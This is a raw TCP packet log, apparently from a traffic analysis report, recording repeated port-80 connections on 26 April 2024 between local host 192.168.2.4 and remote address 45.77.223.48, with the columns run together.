                                            Apr 26, 2024 04:43:11.518567085 CEST804978745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.518578053 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.518605947 CEST804978745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.518618107 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.518652916 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.518826962 CEST804978745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.518929958 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.659666061 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.699182034 CEST804978745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.699304104 CEST804978745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.699321985 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.699361086 CEST4978780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.847567081 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:11.847877026 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:11.850755930 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.038553953 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.038635969 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.226906061 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.917645931 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.917800903 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.917958975 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.918020964 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.934223890 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.934279919 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.939455032 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.939512014 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.939558983 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.939598083 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.939623117 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.939645052 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.940215111 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.940264940 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.940279961 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.940351009 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:12.940352917 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:12.940406084 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.070328951 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.105925083 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.106101036 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.106163025 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.106209993 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.106276989 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.120346069 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.120392084 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.120417118 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.120444059 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.133426905 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.133518934 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.133675098 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.133716106 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.133742094 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.133769989 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.147403955 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.147460938 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.147485018 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.147536039 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.160602093 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.160655022 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.259808064 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.259905100 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.266385078 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.293587923 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.293684006 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.296794891 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.296857119 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.307957888 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.308012009 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.311238050 CEST804978845.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.311288118 CEST4978880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.455430984 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:13.455580950 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:13.645418882 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.381149054 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.381249905 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.381273985 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.381290913 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.381309032 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.381339073 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390116930 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390172005 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390353918 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390393972 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390399933 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390499115 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390532017 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390580893 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390885115 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390933037 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390935898 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.390974045 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.390976906 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.391019106 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.517388105 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.570991993 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.571053028 CEST804978945.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.571077108 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.571105957 CEST4978980192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.706096888 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.706208944 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.708231926 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:14.896722078 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:14.896835089 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.086755991 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.810297966 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.810444117 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.810482025 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.810512066 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.810610056 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.821813107 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.821947098 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822232962 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822287083 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822289944 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822344065 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822366953 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822427034 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822524071 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822575092 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822578907 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822618008 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.822629929 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.822669983 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.975709915 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.999631882 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.999753952 CEST804979045.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:15.999793053 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:15.999841928 CEST4979080192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:16.162162066 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:16.169147968 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:16.174844027 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:16.363085032 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:16.363396883 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:16.549803019 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.296164989 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.296226978 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.296262026 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.296394110 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.296394110 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.296394110 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.303306103 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303369045 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.303770065 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303811073 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303824902 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.303853035 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303859949 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.303903103 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.303936958 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303977966 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.303983927 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.304017067 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.304022074 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.304064035 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.438647032 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.485198975 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.485263109 CEST804979145.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.485387087 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.485387087 CEST4979180192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.627523899 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.627635956 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.632926941 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:17.821432114 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:17.821742058 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.011137962 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.720782995 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.720942020 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.721404076 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.721472025 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.729526997 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.729626894 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.729710102 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.729710102 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.729846954 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.729882956 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.729921103 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.729921103 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.730154037 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.730200052 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.730205059 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.730251074 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.730319977 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.730367899 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.730452061 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.730498075 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.867238045 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.909204006 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.909298897 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.909368992 CEST804979245.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:18.909451962 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.909451962 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:18.909451962 CEST4979280192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:19.054559946 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:19.054709911 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:19.056807995 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:19.245317936 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:19.245510101 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:19.433820009 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.159336090 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.159399986 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.159501076 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.159600019 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.167474031 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.167570114 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.167912960 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168005943 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168016911 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168045044 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168066978 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168121099 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168190956 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168232918 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168246984 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168271065 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168307066 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168311119 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.168333054 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.168364048 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.305967093 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.348507881 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.348573923 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.348599911 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.348617077 CEST804979345.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.348670006 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.348670006 CEST4979380192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.493192911 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.493288994 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.496254921 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.684815884 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:20.684895039 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:20.871211052 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.587587118 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.587707043 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.587744951 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.587805033 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.587898016 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.587912083 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.595545053 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.595608950 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.595608950 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.595658064 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.595786095 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.595833063 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.595873117 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.595921040 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.596366882 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.596410036 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.596419096 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.596457958 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.596520901 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.596569061 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.747915983 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.776316881 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.776576996 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.776621103 CEST804979445.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.776671886 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.776715994 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.776715994 CEST4979480192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.938142061 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:21.938235044 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:21.940706968 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:22.133994102 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:22.138323069 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:22.327416897 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.038809061 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.038935900 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.038957119 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.039201021 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.039252996 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.048779011 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.048830986 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.049536943 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.049578905 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.049588919 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.049628019 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.049700022 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.049736977 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.049751043 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.049777031 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.049854040 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.049899101 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.051150084 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.051198006 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.203244925 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.229015112 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.229070902 CEST804979545.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.229074955 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.229108095 CEST4979580192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.390297890 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.390399933 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.393349886 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.581577063 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:23.581679106 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:23.769191027 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.530702114 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.530751944 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.530803919 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.530827045 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.542562962 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.542694092 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.543848991 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.544001102 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545156956 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545207977 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545358896 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545413971 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545444965 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545501947 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545509100 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545547962 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545561075 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545587063 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.545599937 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.545634985 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.672903061 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.719784021 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.719901085 CEST804979645.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.719930887 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.719944000 CEST4979680192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.861593008 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:24.861789942 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:24.904349089 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:25.092564106 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:25.092916965 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:25.281320095 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:25.995968103 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:25.996140957 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:25.996352911 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:25.996354103 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.007555962 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.007646084 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.007838964 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.007888079 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.007989883 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008037090 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.008064032 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008121967 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.008256912 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008277893 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008302927 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.008318901 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.008351088 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008369923 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.008397102 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.008410931 CEST4979780192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.139389992 CEST4979880192.168.2.445.77.223.48
                                            Apr 26, 2024 04:43:26.186086893 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.186137915 CEST804979745.77.223.48192.168.2.4
                                            Apr 26, 2024 04:43:26.186357975 CEST4979780192.168.2.445.77.223.48
